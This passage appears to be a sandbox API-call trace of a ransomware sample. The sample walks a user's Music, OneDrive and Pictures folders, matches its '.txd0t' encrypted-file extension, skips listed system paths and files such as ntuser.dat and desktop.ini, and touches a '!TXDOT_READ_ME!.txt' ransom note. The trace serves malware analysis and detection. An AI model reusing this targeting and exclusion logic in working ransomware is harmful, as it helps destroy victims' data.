dwReserved1=0x0, cFileName="HN-OE9UFOJ0.mp3.txd0t", cAlternateFileName="HN-OE9~1.TXD")) returned 1 [0129.592] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2=".") returned 1 [0129.592] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2="..") returned 1 [0129.592] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0129.592] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0129.592] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="HN-OE9UFOJ0.mp3.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t" [0129.592] PathFindExtensionW (pszPath="HN-OE9UFOJ0.mp3.txd0t") returned=".txd0t" [0129.592] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.592] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 1 [0129.592] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2=".") returned 1 [0129.592] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2="..") returned 1 [0129.592] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0129.592] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0129.592] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="uUCd01DT4yfQz.wav.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t" [0129.700] PathFindExtensionW (pszPath="uUCd01DT4yfQz.wav.txd0t") returned=".txd0t" [0129.700] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.700] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 0 [0129.701] FindClose (in: hFindFile=0xec1ab0 | out: hFindFile=0xec1ab0) returned 1 [0129.701] GetProcessHeap () returned 0xe30000 [0129.701] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.701] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 0 [0129.701] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.701] GetProcessHeap () returned 0xe30000 [0129.701] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.701] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 0 [0129.701] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.701] GetProcessHeap () returned 0xe30000 [0129.701] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.701] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0129.701] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0129.701] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0129.701] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0129.701] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0129.701] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0129.701] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x6c4d382c, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6c4d382c, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0129.701] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0129.701] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0129.701] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.703] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.703] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="NTUSER.DAT", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\NTUSER.DAT") returned="C:\\Users\\FD1HVy\\NTUSER.DAT" [0129.703] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0129.703] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0129.703] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0129.704] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0129.704] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0129.704] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0129.704] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.704] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.704] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="OneDrive", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\boot\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\programdata\\") returned 0x0 [0129.704] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\drivers\\") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\wsus\\") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="crypt_detect") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="cryptolocker") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="ransomware") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\WINDOWS") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.705] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files") returned 0x0 [0129.705] GetProcessHeap () returned 0xe30000 [0129.705] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed39f8 [0129.705] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\OneDrive", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0129.705] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\OneDrive", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive\\*") returned="C:\\Users\\FD1HVy\\OneDrive\\*" [0129.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.705] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.705] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.705] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.705] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.705] GetProcessHeap () returned 0xe30000 [0129.705] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.705] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0129.705] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.705] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.705] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="crypt_detect") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="cryptolocker") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="ransomware") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.706] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0129.706] GetProcessHeap () returned 0xe30000 [0129.706] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed39f8 [0129.706] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.706] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\*" [0129.706] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.708] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt" [0129.708] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.708] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.708] 